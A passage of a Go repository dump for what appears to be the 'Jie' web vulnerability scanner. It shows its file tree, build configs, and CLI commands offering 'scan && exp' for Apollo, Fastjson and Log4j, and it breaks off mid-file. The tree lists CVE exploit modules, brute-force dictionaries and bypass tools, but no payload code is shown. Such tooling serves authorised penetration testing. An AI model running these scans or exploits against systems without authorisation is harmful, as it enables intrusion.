├── .github └── workflows │ └── release-binary.yml ├── .gitignore ├── .goreleaser ├── linux.yml ├── mac.yml └── windows.yml ├── 1.html ├── LICENSE ├── Makefile ├── README.md ├── README_CN.md ├── SCopilot ├── templates │ ├── SCopilot.html │ ├── about.html │ ├── config.html │ └── index.html └── web.go ├── cmd ├── apollo.go ├── fastjson.go ├── log4j.go ├── other.go ├── root.go ├── shiro.go ├── struts2.go ├── weblogic.go └── webscan.go ├── conf ├── banner.go ├── config.go ├── default.go ├── envCheck.go ├── file.go └── type.go ├── crawler ├── crawlergo.go ├── crawlergo │ ├── config │ │ ├── config.go │ │ └── config_test.go │ ├── domain_collect.go │ ├── engine │ │ ├── after_dom_tasks.go │ │ ├── after_loaded_tasks.go │ │ ├── browser.go │ │ ├── collect_links.go │ │ ├── intercept_request.go │ │ ├── tab.go │ │ └── tab_test.go │ ├── filter │ │ ├── filter.go │ │ ├── simple_filter.go │ │ ├── smart_filter.go │ │ └── smart_filter_test.go │ ├── js │ │ └── javascript.go │ ├── model │ │ ├── request.go │ │ ├── url.go │ │ └── url_test.go │ ├── path_expansion.go │ ├── task_main.go │ ├── taskconfig.go │ ├── taskconfig_test.go │ ├── tools │ │ ├── common.go │ │ ├── random.go │ │ └── requests │ │ │ ├── requests.go │ │ │ ├── response.go │ │ │ └── utils.go │ └── xss │ │ ├── dom.go │ │ └── preload.js ├── katana.go └── katana_test.go ├── fingprints ├── fingprints.go ├── fingprints_test.go ├── framework │ ├── ApacheJackrabbit.go │ ├── AspMvc.go │ ├── CakePHP.go │ ├── CherryPy.go │ ├── CodeIgniter.go │ ├── Dancer.go │ ├── Django.go │ ├── Flask.go │ ├── FuelPHP.go │ ├── Grails.go │ ├── Horde.go │ ├── Karrigell.go │ ├── Laravel.go │ ├── Nette.go │ ├── Phalcon.go │ ├── Play.go │ ├── Rails.go │ ├── Seagull.go │ ├── Spring.go │ ├── Symfony.go │ ├── Web2Py.go │ ├── Yii.go │ ├── Zend.go │ └── beego.go ├── os │ ├── CentOS.go │ ├── Darwin.go │ ├── Debian.go │ ├── Fedora.go │ ├── FreeBSD.go │ ├── Gentoo.go │ ├── RedHat.go │ ├── SUSE.go │ ├── Scientific.go │ ├── SunOS.go │ ├── UNIX.go │ ├── Ubuntu.go │ ├── WindowsCE.go │ └── WindowsServer.go ├── plugins.go ├── programing │ ├── AsciiDoc.go │ ├── Asp.go │ ├── Erlang.go │ ├── Java.go │ ├── Lua.go │ ├── PHP.go │ ├── Perl.go │ ├── Python.go │ └── Ruby.go └── type.go ├── go.mod ├── go.sum ├── images ├── image-20231011213912055.png ├── image-20240101121809597.png ├── image-20240101121931631.png ├── image-20240101121957058.png └── passive-scan-client.png ├── lib.go ├── lib └── cdncheck │ ├── LICENSE.md │ ├── README.md │ ├── cdncheck.go │ ├── cdncheck_test.go │ ├── generate │ ├── input.go │ ├── options.go │ ├── ranges.go │ └── types.go │ ├── other.go │ ├── other_test.go │ ├── sources_data.go │ ├── sources_data.json │ └── types.go ├── main.go ├── pkg ├── ast │ ├── ast_parser.go │ ├── htmlparser.go │ ├── jscontext.go │ └── tree.go ├── input │ └── input.go ├── mitmproxy │ ├── README.md │ ├── go-mitmproxy.go │ ├── go-mitmproxy │ │ ├── LICENSE │ │ ├── README.md │ │ ├── README_CN.md │ │ ├── addon │ │ │ ├── decoder.go │ │ │ ├── dumper.go │ │ │ ├── maplocal.go │ │ │ ├── mapremote.go │ │ │ └── mapremote_test.go │ │ ├── cert │ │ │ ├── cert.go │ │ │ └── cert_test.go │ │ ├── helper │ │ │ ├── helper.go │ │ │ ├── host.go │ │ │ ├── host_test.go │ │ │ ├── proxy.go │ │ │ └── tls.go │ │ └── proxy │ │ │ ├── addon.go │ │ │ ├── attacker.go │ │ │ ├── connection.go │ │ │ ├── connection_test.go │ │ │ ├── entry.go │ │ │ ├── flow.go │ │ │ ├── flowencoding.go │ │ │ ├── helper.go │ │ │ ├── proxy.go │ │ │ ├── proxy_test.go │ │ │ └── websocket.go │ ├── passive.go │ ├── task.go │ └── util.go ├── mode │ ├── active.go │ └── passive.go ├── output │ ├── SCopilot.go │ ├── output.go │ ├── progress.go │ ├── report.go │ ├── screen.go │ ├── type.go │ └── vulnReport.html ├── protocols │ └── httpx │ │ ├── fuzz.go │ │ ├── proxy.go │ │ ├── request.go │ │ └── util.go ├── reverse │ ├── dig_pm.go │ └── dnslog_cn.go ├── task │ ├── scan.go │ └── task.go └── util │ ├── cdnCheck.go │ ├── codec.go │ ├── file.go │ ├── iconhash.go │ ├── parameter.go │ ├── rand.go │ ├── regexp.go │ ├── string.go │ ├── uniqueness.go │ ├── url.go │ └── util.go ├── scan ├── PerFile │ ├── cmdinject │ │ └── cmdinject.go │ ├── fastjson │ │ ├── Detect │ │ │ └── detect.go │ │ ├── LICENSE │ │ ├── README.md │ │ ├── Utils │ │ │ ├── factory.go │ │ │ ├── struct.go │ │ │ └── templates.go │ │ └── fastjson.go │ ├── jsonp │ │ └── jsonp.go │ ├── sql │ │ ├── bool.go │ │ ├── error.go │ │ ├── heuristic.go │ │ ├── images │ │ │ └── image-20230207205442610.png │ │ ├── sql.go │ │ ├── sql.md │ │ ├── sql_test.go │ │ ├── sqlmap │ │ │ ├── sqlmap.go │ │ │ └── type.go │ │ ├── time.go │ │ ├── union.go │ │ ├── util.go │ │ └── xml │ │ │ └── errors.xml │ ├── ssrf │ │ └── ssrf.go │ ├── xss │ │ ├── dom │ │ │ ├── dom.go │ │ │ ├── fuzz.go │ │ │ └── hookparse.go │ │ ├── prototype.go │ │ ├── syntaxAnalysis.go │ │ ├── xss.go │ │ └── xss.md │ └── xxe │ │ └── xxe.go ├── PerFolder │ ├── crlf │ │ └── crlf.go │ ├── iis │ │ └── iis.go │ ├── log4j │ │ └── log4j.go │ └── traversal │ │ ├── README.md │ │ ├── nginxAliasTraversal.go │ │ └── traversal_test.go ├── PerServer │ ├── nuclei.go │ ├── portScan │ │ ├── masscan │ │ │ └── masscan.go │ │ ├── portScan.go │ │ └── scan.go │ └── waybackarchive.go ├── Pocs │ ├── apollo │ │ ├── apollo.go │ │ └── apollo_test.go │ ├── java │ │ ├── shiro │ │ │ ├── CVE_2016_4437.go │ │ │ ├── dicts │ │ │ │ └── keys.txt │ │ │ ├── exploit.go │ │ │ └── gadget.go │ │ ├── struts2 │ │ │ ├── README.md │ │ │ ├── s2-001 │ │ │ │ └── s2-001.go │ │ │ ├── s2-005 │ │ │ │ └── s2-005.go │ │ │ ├── s2-007 │ │ │ │ └── s2-007.go │ │ │ ├── s2-008 │ │ │ │ └── s2-008.go │ │ │ ├── s2-009 │ │ │ │ └── s2-009.go │ │ │ ├── s2-012 │ │ │ │ └── s2-012.go │ │ │ ├── s2-013 │ │ │ │ └── s2-013.go │ │ │ ├── s2-015 │ │ │ │ └── s2-015.go │ │ │ ├── s2-016 │ │ │ │ └── s2-016.go │ │ │ ├── s2-045 │ │ │ │ └── s2-045.go │ │ │ ├── s2-046 │ │ │ │ └── s2-046.go │ │ │ ├── s2-048 │ │ │ │ └── s2-048.go │ │ │ ├── s2-053 │ │ │ │ └── s2-053.go │ │ │ ├── s2-057 │ │ │ │ └── s2-057.go │ │ │ ├── struts2.go │ │ │ └── utils │ │ │ │ └── utils.go │ │ └── weblogic │ │ │ ├── CVE_2014_4210.go │ │ │ ├── CVE_2017_10271.go │ │ │ ├── CVE_2017_3506.go │ │ │ ├── CVE_2018_2894.go │ │ │ ├── CVE_2019_2725.go │ │ │ ├── CVE_2019_2729.go │ │ │ ├── CVE_2020_14882.go │ │ │ ├── CVE_2020_14883.go │ │ │ ├── CVE_2020_2883.go │ │ │ └── CVE_2021_2109.go │ ├── nuclei │ │ ├── nuclei.go │ │ ├── nuclei_test.go │ │ ├── proxy.go │ │ ├── template.go │ │ ├── templates.go │ │ ├── update.go │ │ ├── util.go │ │ └── versioncheck.go │ ├── oa │ │ ├── seeyon │ │ │ ├── BackdoorScan.go │ │ │ ├── CNVD_2019_19299.go │ │ │ ├── CNVD_2020_62422.go │ │ │ ├── CNVD_2021_01627.go │ │ │ ├── CreateMysql.go │ │ │ ├── DownExcelBeanServlet.go │ │ │ ├── GetSessionList.go │ │ │ ├── InitDataAssess.go │ │ │ ├── ManagementStatus.go │ │ │ ├── SeeyonFastjson.go │ │ │ ├── SessionUpload.go │ │ │ └── sql.go │ │ └── yongyou │ │ │ └── nc │ │ │ └── nc.go │ └── pocs_go │ │ ├── ThinkPHP │ │ └── check.go │ │ ├── fastjson │ │ ├── check.go │ │ └── payloads.go │ │ ├── go_poc_check.go │ │ ├── jboss │ │ └── CVE_2017_12149.go │ │ ├── jenkins │ │ ├── CVE_2018_1000110.go │ │ ├── CVE_2018_1000861.go │ │ ├── CVE_2019_1003000.go │ │ └── Unauthorized.go │ │ ├── log4j │ │ ├── payload.go │ │ └── scan.go │ │ ├── phpunit │ │ └── CVE_2017_9841.go │ │ └── tomcat │ │ ├── CVE_2017_12615.go │ │ └── CVE_2020_1938.go ├── bbscan │ ├── README.md │ ├── bbscan.go │ ├── bbscan_test.go │ ├── dicts.go │ ├── fuzzfingerprints.go │ └── rules │ │ ├── black.list │ │ ├── compressed_backup_files.txt │ │ ├── config_file.txt │ │ ├── dangerous_directory.txt │ │ ├── directory_traversal.txt │ │ ├── druid.txt │ │ ├── git_and_svn.txt │ │ ├── go_pprof_debug.txt │ │ ├── java_server_faces2.txt │ │ ├── java_web_config_files.txt │ │ ├── phpinfo_or_apc.txt │ │ ├── phpmyadmin.txt │ │ ├── resin_admin.txt │ │ ├── safetyEquipment.txt │ │ ├── sensitive_url.txt │ │ ├── shell_script_disclosure.txt │ │ ├── source_code_disclosure.txt │ │ ├── springboot.txt │ │ ├── ssh_sensitive_file.txt │ │ ├── test_page.txt │ │ ├── tomcat_manager.txt │ │ └── web_editors.txt ├── gadget │ ├── README.md │ ├── brute │ │ ├── admin_brute.go │ │ ├── basic_brute.go │ │ ├── check_loginpage.go │ │ ├── dicts.go │ │ ├── dicts │ │ │ ├── jbossuserpass.txt │ │ │ ├── tomcatuserpass.txt │ │ │ ├── top100pass.txt │ │ │ └── weblogicuserpass.txt │ │ ├── hydra.go │ │ ├── hydra │ │ │ ├── dict.go │ │ │ ├── ftp.go │ │ │ ├── memcached.go │ │ │ ├── mongodb.go │ │ │ ├── mysql.go │ │ │ ├── oracle.go │ │ │ ├── postgresql.go │ │ │ ├── rdp.go │ │ │ ├── redis.go │ │ │ ├── smb.go │ │ │ ├── sqlserver.go │ │ │ ├── ssh.go │ │ │ └── util.go │ │ ├── jboss_brute.go │ │ ├── tomcat_brute.go │ │ └── weblogic_brute.go │ ├── bypass403 │ │ ├── 403bypass.go │ │ └── dict │ │ │ ├── endpaths.txt │ │ │ ├── headers.txt │ │ │ ├── httpmethods.txt │ │ │ ├── ips.txt │ │ │ ├── midpaths.txt │ │ │ └── simpleheaders.txt │ ├── collection │ │ ├── README.md │ │ ├── collection.go │ │ └── sensitive.go │ ├── jwt │ │ ├── jwt.go │ │ └── secrets.txt │ ├── sensitive │ │ ├── error.go │ │ ├── key.go │ │ ├── keys │ │ │ ├── adafruit-key.yaml │ │ │ ├── adobe │ │ │ │ ├── adobe-client.yaml │ │ │ │ └── adobe-secret.yaml │ │ │ ├── age │ │ │ │ ├── age-identity-secret-key.yaml │ │ │ │ └── age-recipient-public-key.yaml │ │ │ ├── airtable-key.yaml │ │ │ ├── algolia-key.yaml │ │ │ ├── alibaba │ │ │ │ ├── alibaba-key-id.yaml │ │ │ │ └── alibaba-secret-id.yaml │ │ │ ├── amazon │ │ │ │ ├── amazon-account-id.yaml │ │ │ │ ├── amazon-mws-auth-token.yaml │ │ │ │ ├── amazon-session-token.yaml │ │ │ │ ├── amazon-sns-token.yaml │ │ │ │ ├── aws-access-id.yaml │ │ │ │ └── aws-cognito.yaml │ │ │ ├── asana │ │ │ │ ├── asana-clientid.yaml │ │ │ │ └── asana-clientsecret.yaml │ │ │ ├── atlassian │ │ │ │ └── atlassian-api-token.yaml │ │ │ ├── azure │ │ │ │ └── azure-connection-string.yaml │ │ │ ├── beamer-api-token.yaml │ │ │ ├── bitbucket │ │ │ │ ├── bitbucket-client-id.yaml │ │ │ │ └── bitbucket-client-secret.yaml │ │ │ ├── bittrex │ │ │ │ ├── bittrex-access-key.yaml │ │ │ │ └── bittrex-secret-key.yaml │ │ │ ├── branch-key.yaml │ │ │ ├── clojars-api-token.yaml │ │ │ ├── cloudinary.yaml │ │ │ ├── code-climate-token.yaml │ │ │ ├── codecov-access-token.yaml │ │ │ ├── coinbase-access-token.yaml │ │ │ ├── confluent │ │ │ │ ├── confluent-access-token.yaml │ │ │ │ └── confluent-secret-token.yaml │ │ │ ├── contentful-api-token.yaml │ │ │ ├── cratesio-api-key.yaml │ │ │ ├── credential-exposure-file.yaml │ │ │ ├── credentials.yaml │ │ │ ├── databricks-api-token.yaml │ │ │ ├── datadog-access-token.yaml │ │ │ ├── dependency │ │ │ │ └── dependency-track.yaml │ │ │ ├── digitalocean │ │ │ │ ├── digitalocean-access-token.yaml │ │ │ │ ├── digitalocean-personal-access.yaml │ │ │ │ └── digitalocean-refresh-token.yaml │ │ │ ├── discord │ │ │ │ ├── discord-api-token.yaml │ │ │ │ ├── discord-cilent-secret.yaml │ │ │ │ └── discord-client-id.yaml │ │ │ ├── docker │ │ │ │ └── dockerhub-pat.yaml │ │ │ ├── doppler-api-token.yaml │ │ │ ├── doppler │ │ │ │ ├── doppler-audit.yaml │ │ │ │ ├── doppler-cli.yaml │ │ │ │ ├── doppler-scim.yaml │ │ │ │ ├── doppler-service-account.yaml │ │ │ │ └── doppler-service.yaml │ │ │ ├── droneci-access-token.yaml │ │ │ ├── dropbox │ │ │ │ ├── dropbox-access.yaml │ │ │ │ ├── dropbox-api-token.yaml │ │ │ │ ├── dropbox-longlived-token.yaml │ │ │ │ └── dropbox-shortlived-token.yaml │ │ │ ├── duffel-api-token.yaml │ │ │ ├── dynatrace-token.yaml │ │ │ ├── easypost │ │ │ │ ├── easypost-api-token.yaml │ │ │ │ └── easypost-test-token.yaml │ │ │ ├── etsy-access-token.yaml │ │ │ ├── facebook │ │ │ │ ├── facebook-api-token.yaml │ │ │ │ ├── facebook-client-id.yaml │ │ │ │ ├── facebook-secret.yaml │ │ │ │ └── fb-access-token.yaml │ │ │ ├── fastly-api-token.yaml │ │ │ ├── fcm-api-key.yaml │ │ │ ├── figma-access-token.yaml │ │ │ ├── finicity │ │ │ │ ├── finicity-api-token.yaml │ │ │ │ └── finicity-client-secret.yaml │ │ │ ├── finnhub-access-token.yaml │ │ │ ├── firebase-database.yaml │ │ │ ├── flickr-access-token.yaml │ │ │ ├── flutter │ │ │ │ ├── flutterwave-encryption-key.yaml │ │ │ │ ├── flutterwave-public-key.yaml │ │ │ │ └── flutterwave-secret-key.yaml │ │ │ ├── frameio-api-token.yaml │ │ │ ├── freshbooks-access-token.yaml │ │ │ ├── gcp-service-account.yaml │ │ │ ├── github │ │ │ │ ├── github-app-token.yaml │ │ │ │ ├── github-oauth-token.yaml │ │ │ │ ├── github-outdated-key.yaml │ │ │ │ ├── github-personal-token.yaml │ │ │ │ └── github-refresh-token.yaml │ │ │ ├── gitlab │ │ │ │ ├── gitlab-personal-accesstoken.yaml │ │ │ │ ├── gitlab-pipeline-triggertoken.yaml │ │ │ │ └── gitlab-runner-regtoken.yaml │ │ │ ├── gitter-access-token.yaml │ │ │ ├── gocardless-api-token.yaml │ │ │ ├── google │ │ │ │ ├── google-api.yaml │ │ │ │ ├── google-clientid.yaml │ │ │ │ └── google-oauth-clientsecret.yaml │ │ │ ├── grafana │ │ │ │ ├── grafana-api-key.yaml │ │ │ │ ├── grafana-cloud-api-token.yaml │ │ │ │ └── grafana-service-account-token.yaml │ │ │ ├── hashicorp-api-token.yaml │ │ │ ├── heroku-key.yaml │ │ │ ├── huggingface │ │ │ │ └── huggingface-user-access.yaml │ │ │ ├── jenkins-token.yaml │ │ │ ├── kubernetes │ │ │ │ ├── kubernetes-dockercfg-secret.yaml │ │ │ │ └── kubernetes-dockerconfigjson-secret.yaml │ │ │ ├── linkedin-id.yaml │ │ │ ├── linkedin │ │ │ │ ├── linkedin-client.yaml │ │ │ │ └── linkedin-secret.yaml │ │ │ ├── mailchimp-api.yaml │ │ │ ├── mailgun-api.yaml │ │ │ ├── mapbox-token.yaml │ │ │ ├── newrelic │ │ │ │ ├── newrelic-api-service.yaml │ │ │ │ ├── newrelic-license-non.yaml │ │ │ │ ├── newrelic-license.yaml │ │ │ │ ├── newrelic-pixie-apikey.yaml │ │ │ │ └── newrelic-pixie-deploykey.yaml │ │ │ ├── npm-accesstoken.yaml │ │ │ ├── nuget-key.yaml │ │ │ ├── odbc │ │ │ │ └── odbc-connection.yaml │ │ │ ├── okta │ │ │ │ └── okta-api.yaml │ │ │ ├── openai-key.yaml │ │ │ ├── particle │ │ │ │ └── particle-access.yaml │ │ │ ├── paypal-braintree-token.yaml │ │ │ ├── pictatic-api-key.yaml │ │ │ ├── postman-api-key.yaml │ │ │ ├── private-key.yaml │ │ │ ├── pypi-token.yaml │ │ │ ├── razorpay-client-id.yaml │ │ │ ├── react │ │ │ │ ├── reactapp-password.yaml │ │ │ │ └── reactapp-username.yaml │ │ │ ├── rubygems-key.yaml │ │ │ ├── s3-bucket.yaml │ │ │ ├── salesforce │ │ │ │ └── salesforce-access.yaml │ │ │ ├── sauce-access-token.yaml │ │ │ ├── segment-public-api.yaml │ │ │ ├── sendgrid-api.yaml │ │ │ ├── shopify-custom-token.yaml │ │ │ ├── shopify-private-token.yaml │ │ │ ├── shopify-public-access.yaml │ │ │ ├── shopify-shared-secret.yaml │ │ │ ├── shopify-token.yaml │ │ │ ├── slack-api.yaml │ │ │ ├── slack-webhook.yaml │ │ │ ├── square-access-token.yaml │ │ │ ├── square-oauth-secret.yaml │ │ │ ├── stackhawk-api-key.yaml │ │ │ ├── stripe-api-key.yaml │ │ │ ├── telegram-token.yaml │ │ │ ├── thingsboard │ │ │ │ └── thingsboard-access.yaml │ │ │ ├── truenas │ │ │ │ └── truenas-api.yaml │ │ │ ├── twilio-api.yaml │ │ │ ├── twitter │ │ │ │ ├── twitter-client.yaml │ │ │ │ └── twitter-secret.yaml │ │ │ ├── wireguard │ │ │ │ ├── wireguard-preshared.yaml │ │ │ │ └── wireguard-private.yaml │ │ │ ├── zapier-webhook.yaml │ │ │ └── zendesk-secret-key.yaml │ │ ├── sensitive.go │ │ ├── sensitive.md │ │ ├── wih.go │ │ └── wih.yml │ ├── swagger │ │ ├── swagger.go │ │ └── swagger_test.go │ ├── waf │ │ ├── waf-detect.go │ │ └── waf-detect.yaml │ └── waybackarchive │ │ └── waybackarchive.go ├── plugins.go ├── type.go └── util │ └── black.go └── test ├── ast_test.go ├── cdncheck_test.go ├── crawler_test.go ├── jie_test.go ├── jsluice_test.go ├── passive_test.go ├── vulnReport_test.go ├── vulnerability_report.html ├── web_test.go └── xss_test.go /.gitignore: -------------------------------------------------------------------------------- 1 | # Binaries for programs and plugins 2 | *.db 3 | .idea 4 | logs 5 | data 6 | Jie_config.yaml 7 | scan/bbscan/rules/personal_rules.txt 8 | .DS_Store 9 | test.go 10 | # Test binary, built with `go test -c` 11 | *.test 12 | 13 | # Output of the go coverage tool, specifically when used with LiteIDE 14 | *.out 15 | -------------------------------------------------------------------------------- /.goreleaser/linux.yml: -------------------------------------------------------------------------------- 1 | before: 2 | hooks: 3 | - go mod tidy 4 | project_name: Jie 5 | builds: 6 | - id: Jie-linux 7 | ldflags: 8 | - -s -w 9 | binary: Jie 10 | env: 11 | - CGO_ENABLED=1 12 | main: ./main.go 13 | goos: 14 | - linux 15 | goarch: 16 | - amd64 17 | # - arm64 18 | archives: 19 | - format: zip 20 | name_template: '{{ .ProjectName }}_{{ .Version }}_{{ if eq .Os "darwin" }}macOS{{ else }}{{ .Os }}{{ end }}_{{ .Arch }}' 21 | 22 | checksum: 23 | name_template: "{{ .ProjectName }}-linux-checksums.txt" 24 | -------------------------------------------------------------------------------- /.goreleaser/mac.yml: -------------------------------------------------------------------------------- 1 | before: 2 | hooks: 3 | - go mod tidy 4 | project_name: Jie 5 | builds: 6 | - id: Jie-darwin 7 | ldflags: 8 | - -s -w 9 | binary: Jie 10 | env: 11 | - CGO_ENABLED=1 12 | main: ./main.go 13 | goos: 14 | - darwin 15 | goarch: 16 | - amd64 17 | - arm64 18 | archives: 19 | - format: zip 20 | name_template: '{{ .ProjectName }}_{{ .Version }}_{{ if eq .Os "darwin" }}macOS{{ else }}{{ .Os }}{{ end }}_{{ .Arch }}' 21 | 22 | checksum: 23 | name_template: "{{ .ProjectName }}-mac-checksums.txt" 24 | -------------------------------------------------------------------------------- /.goreleaser/windows.yml: -------------------------------------------------------------------------------- 1 | before: 2 | hooks: 3 | - go mod tidy 4 | project_name: Jie 5 | builds: 6 | - id: Jie-windows 7 | ldflags: 8 | - -s -w 9 | binary: Jie 10 | env: 11 | - CGO_ENABLED=1 # necessary only with winpcap 12 | main: ./main.go 13 | goos: 14 | - windows 15 | goarch: 16 | - amd64 17 | # - arm64 18 | # - 386 19 | archives: 20 | - format: zip 21 | name_template: '{{ .ProjectName }}_{{ .Version }}_{{ if eq .Os "darwin" }}macOS{{ else }}{{ .Os }}{{ end }}_{{ .Arch }}' 22 | 23 | checksum: 24 | name_template: "{{ .ProjectName }}-windows-checksums.txt" 25 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | # SScan version 2 | VERSION=$(shell cat conf/banner.go |grep "const Version ="|cut -d"\"" -f2) 3 | # Output File Location 4 | DIR=data/v${VERSION} 5 | $(shell mkdir -p ${DIR}) 6 | # go build flags 删除符号表和调试信息,减小生成文件的大小 7 | LDFLAGS=-ldflags "-s -w" 8 | 9 | default: 10 | export CGO_ENABLED=1;go build ${LDFLAGS} -o ${DIR}/Jie main.go 11 | 12 | # 会在程序奔溃时生成 coredump 文件,可以使用 https://github.com/go-delve/delve 工具调试 13 | debug: 14 | export CGO_ENABLED=1;go build -o ${DIR}/Jie main.go; ulimit -c unlimited; export GOTRACEBACK=crash 15 | 16 | # clean 17 | clean: 18 | rm -rf ${DIR} -------------------------------------------------------------------------------- /cmd/apollo.go: -------------------------------------------------------------------------------- 1 | package cmd 2 | 3 | import ( 4 | "github.com/spf13/cobra" 5 | 6 | "github.com/yhy0/Jie/conf" 7 | "github.com/yhy0/Jie/scan/Pocs/apollo" 8 | ) 9 | 10 | /** 11 | @author yhy 12 | @since 2023/8/20 13 | @desc //TODO 14 | **/ 15 | 16 | var ( 17 | as string 18 | cs string 19 | ) 20 | 21 | var apolloCmd = &cobra.Command{ 22 | Use: "apollo", 23 | Short: "apollo scan && exp", 24 | Run: func(cmd *cobra.Command, args []string) { 25 | as = conf.GlobalConfig.Options.Target 26 | apollo.Run(as, cs) 27 | }, 28 | } 29 | 30 | func apolloCmdInit() { 31 | rootCmd.AddCommand(apolloCmd) 32 | apolloCmd.Flags().StringVarP(&as, "as", "a", "", "adminService url(-t)") 33 | apolloCmd.Flags().StringVarP(&cs, "cs", "c", "", "configService, spring Eureka url") 34 | apolloCmd.MarkFlagRequired("cs") 35 | } 36 | -------------------------------------------------------------------------------- /cmd/fastjson.go: -------------------------------------------------------------------------------- 1 | package cmd 2 | 3 | import ( 4 | "github.com/spf13/cobra" 5 | "github.com/yhy0/Jie/conf" 6 | "github.com/yhy0/Jie/pkg/protocols/httpx" 7 | "github.com/yhy0/Jie/scan/PerFile/fastjson" 8 | ) 9 | 10 | /** 11 | @author yhy 12 | @since 2023/8/19 13 | @desc //TODO 14 | **/ 15 | 16 | var fastjsonCmd = &cobra.Command{ 17 | Use: "fastjson", 18 | Short: "fastjson scan && exp", 19 | Run: func(cmd *cobra.Command, args []string) { 20 | for _, target := range conf.GlobalConfig.Options.Targets { 21 | fastjson.Scan(target, httpx.NewClient(nil)) 22 | } 23 | 24 | }, 25 | } 26 | 27 | func fastjsonCmdInit() { 28 | rootCmd.AddCommand(fastjsonCmd) 29 | } 30 | -------------------------------------------------------------------------------- /cmd/log4j.go: -------------------------------------------------------------------------------- 1 | package cmd 2 | 3 | import ( 4 | "github.com/spf13/cobra" 5 | "github.com/yhy0/Jie/conf" 6 | "github.com/yhy0/Jie/pkg/protocols/httpx" 7 | "github.com/yhy0/Jie/scan/Pocs/pocs_go/log4j" 8 | ) 9 | 10 | /** 11 | @author yhy 12 | @since 2023/8/19 13 | @desc //TODO 14 | **/ 15 | 16 | var log4jCmd = &cobra.Command{ 17 | Use: "log4j", 18 | Short: "log4j scan && exp", 19 | Run: func(cmd *cobra.Command, args []string) { 20 | for _, target := range conf.GlobalConfig.Options.Targets { 21 | log4j.Scan(target, "GET", "", httpx.NewClient(nil)) 22 | } 23 | 24 | }, 25 | } 26 | 27 | func log4jCmdInit() { 28 | rootCmd.AddCommand(log4jCmd) 29 | log4jCmd.Flags().StringVarP(&conf.GlobalConfig.Reverse.Host, "host", "h", "https://dig.pm", "dns host") 30 | log4jCmd.Flags().StringVarP(&domain, "domain", "d", "", "domain ") 31 | } 32 | -------------------------------------------------------------------------------- /conf/banner.go: -------------------------------------------------------------------------------- 1 | package conf 2 | 3 | /** 4 | @author: yhy 5 | @since: 2023/1/27 6 | @desc: //TODO 7 | **/ 8 | 9 | var Banner = ` 10 | ██╗██╗███████╗ 11 | ██║██║██╔════╝ 12 | ██║██║█████╗ 13 | ██ ██║██║██╔══╝ 14 | ╚█████╔╝██║███████╗ 15 | ╚════╝ ╚═╝╚══════╝ 16 | ` 17 | 18 | const Website = "https://github.com/yhy0/Jie" 19 | 20 | const Version = "1.2.0" 21 | -------------------------------------------------------------------------------- /conf/config.go: -------------------------------------------------------------------------------- 1 | package conf 2 | 3 | import ( 4 | folderutil "github.com/projectdiscovery/utils/folder" 5 | wappalyzer "github.com/projectdiscovery/wappalyzergo" 6 | "path/filepath" 7 | ) 8 | 9 | /** 10 | @author: yhy 11 | @since: 2023/2/1 12 | @desc: //TODO 13 | **/ 14 | 15 | var GlobalConfig = &Config{} 16 | 17 | var ConfigFile string 18 | 19 | var NoProgressBar bool 20 | 21 | // FilePath 一些配置文件的默认位置 22 | var FilePath string 23 | 24 | var Wappalyzer *wappalyzer.Wappalyze 25 | 26 | func init() { 27 | homedir := folderutil.HomeDirOrDefault("") 28 | 29 | userCfgDir := filepath.Join(homedir, ".config") 30 | 31 | FilePath = filepath.Join(userCfgDir, "Jie") 32 | } 33 | -------------------------------------------------------------------------------- /crawler/crawlergo/config/config_test.go: -------------------------------------------------------------------------------- 1 | package config_test 2 | 3 | import ( 4 | "github.com/yhy0/Jie/crawler/crawlergo/config" 5 | "testing" 6 | 7 | "github.com/stretchr/testify/assert" 8 | ) 9 | 10 | func TestStaticSuffix(t *testing.T) { 11 | assert.Equal(t, true, config.StaticSuffixSet.Contains("png")) 12 | assert.Equal(t, false, config.StaticSuffixSet.Contains("demo")) 13 | 14 | assert.Equal(t, true, config.ScriptSuffixSet.Contains("asp")) 15 | assert.Equal(t, false, config.ScriptSuffixSet.Contains("demo")) 16 | } 17 | -------------------------------------------------------------------------------- /crawler/crawlergo/engine/tab_test.go: -------------------------------------------------------------------------------- 1 | package engine_test 2 | 3 | import ( 4 | "sync" 5 | "testing" 6 | "time" 7 | ) 8 | 9 | func TestChannel(t *testing.T) { 10 | wg := sync.WaitGroup{} 11 | 12 | for range "..." { 13 | wg.Add(1) 14 | go func() { 15 | defer wg.Done() 16 | t.Log("=====> go func") 17 | time.Sleep(time.Second * 5) 18 | t.Log("go func done! <<<<========") 19 | }() 20 | } 21 | 22 | waitDone := func() <-chan struct{} { 23 | wg.Wait() 24 | ch := make(chan struct{}) 25 | defer close(ch) 26 | return ch 27 | } 28 | 29 | select { 30 | case <-waitDone(): 31 | t.Log("all goroutine done") 32 | case <-time.After(time.Second * 10): 33 | t.Error("timeout") 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /crawler/crawlergo/filter/filter.go: -------------------------------------------------------------------------------- 1 | package filter 2 | 3 | import ( 4 | "github.com/yhy0/Jie/crawler/crawlergo/model" 5 | ) 6 | 7 | type Handler interface { 8 | DoFilter(req *model.Request) bool 9 | } 10 | -------------------------------------------------------------------------------- /crawler/crawlergo/tools/requests/response.go: -------------------------------------------------------------------------------- 1 | package requests 2 | 3 | import ( 4 | "github.com/yhy0/logging" 5 | "io/ioutil" 6 | "net/http" 7 | ) 8 | 9 | // 自定义一些函数 10 | type Response struct { 11 | http.Response 12 | // raw text Response 13 | Text string 14 | } 15 | 16 | func getTextFromResp(r *http.Response) string { 17 | // TODO: 编码转换 18 | if r.ContentLength == 0 { 19 | return "" 20 | } 21 | b, err := ioutil.ReadAll(r.Body) 22 | if err != nil { 23 | logging.Logger.Debug("get response body err ", err) 24 | } 25 | _ = r.Body.Close() 26 | return string(b) 27 | } 28 | 29 | func NewResponse(r *http.Response) *Response { 30 | return &Response{ 31 | Response: *r, 32 | Text: getTextFromResp(r), 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /crawler/crawlergo/tools/requests/utils.go: -------------------------------------------------------------------------------- 1 | package requests 2 | 3 | import ( 4 | "github.com/pkg/errors" 5 | "net/url" 6 | "strings" 7 | ) 8 | 9 | // UrlParse 调用url.Parse,增加了对%的处理 10 | func UrlParse(sourceUrl string) (*url.URL, error) { 11 | u, err := url.Parse(sourceUrl) 12 | if err != nil { 13 | u, err = url.Parse(escapePercentSign(sourceUrl)) 14 | } 15 | if err != nil { 16 | return nil, errors.Wrap(err, "parse url error") 17 | } 18 | return u, nil 19 | } 20 | 21 | // escapePercentSign 把url中的%替换为%25 22 | func escapePercentSign(raw string) string { 23 | return 